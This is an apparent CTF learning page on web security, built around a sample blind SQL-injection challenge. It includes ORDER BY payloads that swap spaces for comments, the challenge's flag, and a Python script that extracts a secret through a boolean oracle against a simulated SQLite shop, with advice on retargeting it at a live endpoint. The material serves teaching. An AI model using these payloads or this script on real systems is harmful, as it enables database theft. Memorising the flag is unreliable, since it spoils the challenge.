
Web Security

Web challenges test your ability to find and exploit vulnerabilities in websites and APIs. Topics range from classic injection attacks to modern OAuth/JWT flaws, SSRF, GraphQL abuse, and prototype pollution.

What is it?

Web security is the practice of finding and fixing vulnerabilities in websites, web applications, and APIs. Attackers exploit these flaws to steal data, hijack accounts, execute commands on servers, or pivot deeper into an organisation's infrastructure.

It is one of the most impactful security disciplines because nearly every business has a public-facing web presence. A single misconfigured endpoint can expose millions of user records.

How it works in a CTF

In a CTF, you are given a URL (or a source-code dump) and must find a vulnerability to read a hidden flag. Challenges are self-contained web apps that deliberately contain one or more bugs — your job is to discover and exploit them before other teams.

Common workflows: intercept HTTP traffic with Burp Suite → inspect parameters and cookies → fuzz inputs → research the bug class → craft a proof-of-concept → extract the flag from the server response or database.

Example challenge types
  - SQL Injection (dump the DB)
  - XSS → cookie theft
  - SSRF → cloud metadata
  - IDOR (access another user's data)
  - JWT algorithm confusion
  - SSTI (server-side template injection)
  - Path traversal / LFI
  - OAuth state bypass
  - GraphQL introspection abuse
  - CORS misconfiguration
  - XXE (external entity injection)
  - Command injection via form field

Sample Challenge

Blind Order
Category: Web | Difficulty: Medium | 250 pts
A small e-commerce site lets you sort products by column name via a ?sort= query parameter. The application passes this value directly into a SQL ORDER BY clause — sanitising only for spaces. There is no visible error output, making this a blind SQL injection.
Attachment: shop.zip
How to solve it
  1. Intercept the GET /products?sort=name request in Burp Suite and send it to Repeater so you can vary the parameter quickly.
  2. Confirm the parameter lands in an ORDER BY clause: sort=name and sort=price return the products in different orders. Because spaces are stripped, a direction keyword has to be separated by a comment instead of a space: sort=name/**/DESC reverses the list, whereas sort=name DESC is collapsed to nameDESC and fails without any error message.
  3. Use a boolean-based payload with /**/ standing in for every space: sort=(CASE/**/WHEN/**/1=1/**/THEN/**/name/**/ELSE/**/price/**/END) sorts by name, and changing 1=1 to 1=2 sorts by price. The position of the first product is your true/false oracle, confirming blind injection.
  4. Write a Python loop that replaces the constant condition with SUBSTR((SELECT flag FROM secrets),i,1)='c' (spaces again replaced by /**/), iterating i over each position and c over the flag character set until the order flips.
  5. Assemble the recovered characters into the flag string.
FLAG{bl1nd_0rd3r_by_expl01t}
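The extraction described in steps 2 to 5, as an added worked example that is not part of the challenge's shop.zip or its intended solution. It simulates the vulnerable handler in an in-memory SQLite database with constructed data, and assumes the table and column names the challenge text mentions (secrets.flag, products with name and price columns). It goes beyond the letter-by-letter SUBSTR loop in step 4: it uses SQLite's UNICODE() function with a binary search, so each character costs about seven oracle requests rather than one per candidate letter.

```python
import sqlite3

# Constructed stand-in for the secret; in the real challenge the attacker does not know it.
FLAG = "FLAG{bl1nd_0rd3r_by_expl01t}"


def build_shop():
    """In-memory SQLite stand-in for the shop (constructed data, not shop.zip)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE products(name TEXT, price REAL);
        INSERT INTO products VALUES ('zebra mug', 5.0), ('apple tray', 20.0), ('mango lamp', 12.0);
        CREATE TABLE secrets(flag TEXT);
        """
    )
    db.execute("INSERT INTO secrets VALUES (?)", (FLAG,))
    return db


def products(db, sort):
    """The vulnerable handler as the challenge describes it: the only sanitisation
    is stripping spaces, then the value is interpolated into ORDER BY.
    Database errors are swallowed, so the attacker never sees a message (blind)."""
    sort = sort.replace(" ", "")
    try:
        rows = db.execute(f"SELECT name FROM products ORDER BY {sort}").fetchall()
    except sqlite3.Error:
        rows = []
    return [r[0] for r in rows]


def oracle(db, condition):
    """True if `condition` holds on the server: a true CASE sorts by name, a false
    one by price, and the first product differs between the two orders.
    Spaces in the payload are rewritten to /**/ so they survive the space filter."""
    payload = f"(CASE WHEN {condition} THEN name ELSE price END)".replace(" ", "/**/")
    return products(db, payload)[:1] == products(db, "name")[:1]


def bsearch(db, template, lo, hi):
    """Return the integer v in [lo, hi] such that template.format(v) is false for
    v and true for v-1; template must express 'value > {}'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(db, template.format(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_flag(db, max_len=64):
    """Recover secrets.flag through the ORDER BY oracle, one character at a time."""
    length = bsearch(db, "LENGTH((SELECT flag FROM secrets))>{}", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        # UNICODE() returns the code point, so a binary search over printable
        # ASCII (32..126) needs ~7 requests per character instead of up to 95.
        code = bsearch(db, f"UNICODE(SUBSTR((SELECT flag FROM secrets),{i},1))>{{}}", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    shop = build_shop()
    print(products(shop, "name DESC"))    # collapsed to nameDESC: fails silently, empty list
    print(products(shop, "name/**/DESC"))  # comment as whitespace: reversed order
    print(extract_flag(shop))
```

Against a live target, replace `products()` with an HTTP request to /products and compare the first product name in the response body; everything else, including the space-to-comment rewrite, stays the same. The `max_len` bound only matters if the flag is longer than 64 characters, in which case the length search saturates and the result is truncated.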

Getting Started Tips

💡 Tip: Start every web challenge by mapping the app: enumerate endpoints, parameters, cookies, and headers before attempting exploits.
💡 Tip: PortSwigger Web Security Academy is the single best free resource — complete the SQLi, XSS, and SSRF labs first.
💡 Tip: Set up Burp Suite's browser extension and develop the habit of inspecting every HTTP request/response.
💡 Tip: Read writeups after every challenge you solve or give up on — patterns repeat across competitions.